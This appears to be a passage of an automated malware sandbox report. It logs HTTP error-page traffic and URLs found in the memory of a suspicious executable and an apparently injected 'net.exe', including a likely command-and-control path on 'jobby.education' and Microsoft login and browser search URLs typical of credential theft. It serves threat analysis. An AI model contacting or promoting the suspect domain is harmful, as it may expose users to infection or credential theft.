6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not 
Found</h1></center><hr><center>nginx/1.26.2</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 08:04:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 08:04:23 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 08:04:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 08:04:28 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 06 Feb 2025 08:05:23 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 06 Feb 2025 08:05:25 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Thu, 06 Feb 2025 08:05:28 GMTContent-Type: text/htmlContent-Length: 166Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Thu, 06 Feb 2025 08:05:30 GMTContent-Type: text/htmlContent-Length: 0Connection: close
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 08:05:52 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HRFwBpQjfrovaLXP7xndc9xYPpwTaqiPzAzTjyA5uyrpdE677G48kPbC8Lcz8ombLZB%2FKd4fhTloVZ%2B%2FKYb%2FoIKHQKVMXRSQQdsXa3FonBsjjoy7PmUYPRLa4koc%2BkvBGXgkWMgG%2Fcs14as%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90d9a33859f4c358-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1648&min_rtt=1648&rtt_var=824&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=773&delivery_rate=0&cwnd=153&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 e2 e2 e2 02 00 00 00 ff ff 0d 0a Data Ascii: 13
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 08:05:54 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gfJUdrERFo0hJlK3fUTcZxwHW32QCOSh4dqMycibZClfQtBSFUSLi714km2d6iXHxxgcyR9oqDb502bhwncqKYOdBInjFQOvSEezjus5F3WGNlO5Y0Nz1PJJM2%2BEedlR8ZVvRpJNTXExx9s%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90d9a3486ba14414-EWRContent-Encoding: gzipalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1646&min_rtt=1646&rtt_var=823&sent=2&recv=4&lost=0&retrans=0&sent_bytes=0&recv_bytes=1786&delivery_rate=0&cwnd=178&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"Data Raw: 31 32 66 66 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a 59 97 a3 4a 72 7e bf bf 42 ae 39 b6 67 0e 5d cd 2e a0 6e 55 db 80 10 20 09 04 48 48 42 2f f7 24 90 2c 62 15 bb e4 33 3f c8 7f c3 bf cc 47 55 bd 54 57 49 dd 7d 67 fc e0 7c 28 91 99 11 91 91 b1 7c 41 65 f2 db 6f bf 3d fe cb 64 29 ae 1d 43 1a 45 4d 96 7e fa ed f1 e5 67 34 1a 8d 1e 23 08 fc cf 8f 19 6c c0 28 6a 9a f2 1e 1e db b8 7b ba 13 8b bc 81 79 73 df 9c 4a 78 37 f2 5e 7a 4f 77 0d 1c 1a f4 22 e2 f7 91 17 81 aa 86 cd 53 db 04 f7 ec dd 4d 39 c0 8b e0 fd 85 bf 2a d2 57 82 f2 e2 de bb 4c dd 64 34 2a 10 66 e0 cf 70 48 43 19 57 b0 7e c5 82 7d 47 9b 83 0c 3e dd 75 31 ec cb a2 6a 5e 91 f5 b1 df 44 4f 3e ec 62 0f de 3f 77 3e 8c e2 3c 6e 62 90 de d7 1e 48 e1 13 fe f1 ab a8 26 6e 52 f8 89 c2 a8 91 5e 34 a3 69 d1 e6 fe 23 fa 32 f8 42 50 37 a7 14 8e 2e 76 fb 6c 2e af ae 3f 33 5f 9a 5b f8 a7 d1 7f 7d ed 5e 5a 50 e4 cd 7d 00 b2 38 3d 3d 8c f8 2a 06 e9 87 91 02 d3 0e 36 b1 07 3e 8c 6a 90 d7 f7 35 ac e2 e0 f7 f7 6c 75 7c 86 0f 23 9c 2a 87 ef 27 d3 38 87 f7 11 8c c3 a8 79 18 e1 1f 29 82 a5 19 9c 22 b8 ef a9 Data Ascii: 
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Thu, 06 Feb 2025 08:05:58 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeAccept-Ranges: bytesCache-Control: no-cache, no-store, must-revalidatePragma: no-cacheExpires: 0cf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OvXLRWehCtl7ekT2h%2FbVc%2F0w%2FzVDIeISq0gK3czWypN37Ht9aYqrgdsnUkDGQsEQmK2FkSG3HB4uclLdq8C6%2FQ8R1a8U81d1gTzAASilDoKPDHa719k%2F8zXqcoiUQuCRnWL11o84BVa1gDI%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 90d9a3594f9cde95-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=1729&min_rtt=1729&rtt_var=864&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=476&delivery_rate=0&cwnd=246&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                Source: net.exe, 0000000B.00000002.4655359718.0000000004856000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003906000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://cpanel.com/?utm_source=cpanelwhm&utm_medium=cplogo&utm_content=logolink&utm_campaign=404refer
                Source: TjdgrMPwNLGImh.exe, 0000000C.00000002.4655930930.0000000004BAB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jobby.education
                Source: TjdgrMPwNLGImh.exe, 0000000C.00000002.4655930930.0000000004BAB000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.jobby.education/gkpc/
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fburl.com
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Open
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Source
                Source: net.exe, 0000000B.00000002.4649724687.0000000002BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: net.exe, 0000000B.00000003.2825701084.00000000078DC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: net.exe, 0000000B.00000002.4649724687.0000000002BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2)
                Source: net.exe, 0000000B.00000002.4649724687.0000000002BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: net.exe, 0000000B.00000002.4649724687.0000000002BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033v
                Source: net.exe, 0000000B.00000002.4649724687.0000000002BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 0000000B.00000002.4649724687.0000000002BE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://nl.trustpilot.com/review/www.transip.nl
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://optimize.google.com
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://td.doubleclick.net
                Source: TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.eu/cp/
                Source: TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://transip.nl/cp/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://trustpilot.com/review/www.transip.nl
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/v2/source/html5shiv.min.js?v=1569310222693
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://w.ladicdn.com/v2/source/respond.min.js?v=1569310222693
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
                Source: net.exe, 0000000B.00000002.4655359718.0000000004B7A000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003C2A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: net.exe, 0000000B.00000003.2831447215.00000000078F8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googleanalytics.com
                Source: net.exe, 0000000B.00000002.4655359718.0000000004D0C000.00000004.10000000.00040000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003DBC000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.googleoptimize.com
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/entry/284-start-sending-receiving-email-domain/
                Source: net.exe, 0000000B.00000002.4655359718.00000000049E8000.00000004.10000000.00040000.00000000.sdmp, net.exe, 0000000B.00000002.4657252814.0000000005E70000.00000004.00000800.00020000.00000000.sdmp, TjdgrMPwNLGImh.exe, 0000000C.00000002.4653893359.0000000003A98000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.transip.eu/knowledgebase/entry/5885/
